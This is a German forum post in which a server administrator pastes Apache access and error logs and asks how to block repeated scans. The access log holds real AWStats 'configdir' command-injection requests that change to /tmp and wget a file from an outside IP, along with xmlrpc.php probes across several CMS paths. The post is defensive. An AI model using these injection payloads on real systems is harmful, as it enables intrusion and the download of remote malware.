Hallo!
Seit einigen Tagen finde ich in den Log-Dateien meines RootDS Linux (SuSE 9.3, Server4You) vermehrt folgende Einträge:
In der vsxxxxxx.vserver.de_access.log...
und in der vsxxxxxx.vserver.de_error.log...
Die sind nur die Einträge der IP 210.177.203.6. Identische Einträge finde ich für viele viele andere IPs. So wie es aussieht, würde ich sagen versucht jemand, über bekannte Lücken in das System zu kommen.
Kann man diese Abfragen - da es immer auf die gleiche Verzeichnisse und Dateien abzielt - irgendwie blocken?
Seit einigen Tagen finde ich in den Log-Dateien meines RootDS Linux (SuSE 9.3, Server4You) vermehrt folgende Einträge:
In der vsxxxxxx.vserver.de_access.log...
Code:
210.177.203.6 - - [16/Jan/2006:08:46:55 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%
210.177.203.6 - - [16/Jan/2006:08:46:57 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%
210.177.203.6 - - [16/Jan/2006:08:46:58 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2
210.177.203.6 - - [16/Jan/2006:08:46:59 +0100] "POST /xmlrpc.php HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:01 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:02 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
210.177.203.6 - - [16/Jan/2006:08:47:03 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
210.177.203.6 - - [16/Jan/2006:08:47:05 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:06 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
210.177.203.6 - - [16/Jan/2006:08:47:08 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:09 +0100] "POST /xmlrpc.php HTTP/1.1" 404 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:10 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.177.203.6 - - [16/Jan/2006:08:47:12 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
und in der vsxxxxxx.vserver.de_error.log...
Code:
[Mon Jan 16 08:46:55 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/awstats
[Mon Jan 16 08:46:57 2006] [error] [client 210.177.203.6] script not found or unable to stat: /srv/www/confixx/html/cgi-bin/awstats.pl
[Mon Jan 16 08:46:58 2006] [error] [client 210.177.203.6] script not found or unable to stat: /srv/www/confixx/html/cgi-bin/awstats
[Mon Jan 16 08:46:59 2006] [error] [client 210.177.203.6] script '/srv/www/confixx/html/xmlrpc.php' not found or unable to stat
[Mon Jan 16 08:47:02 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/blog
[Mon Jan 16 08:47:03 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/blog
[Mon Jan 16 08:47:04 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/blogs
[Mon Jan 16 08:47:06 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/drupal
[Mon Jan 16 08:47:07 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/phpgroupware
[Mon Jan 16 08:47:09 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/wordpress
[Mon Jan 16 08:47:09 2006] [error] [client 210.177.203.6] script '/srv/www/confixx/html/xmlrpc.php' not found or unable to stat
[Mon Jan 16 08:47:11 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/xmlrpc
[Mon Jan 16 08:47:13 2006] [error] [client 210.177.203.6] File does not exist: /srv/www/confixx/html/xmlsrv
Die sind nur die Einträge der IP 210.177.203.6. Identische Einträge finde ich für viele viele andere IPs. So wie es aussieht, würde ich sagen versucht jemand, über bekannte Lücken in das System zu kommen.
Kann man diese Abfragen - da es immer auf die gleiche Verzeichnisse und Dateien abzielt - irgendwie blocken?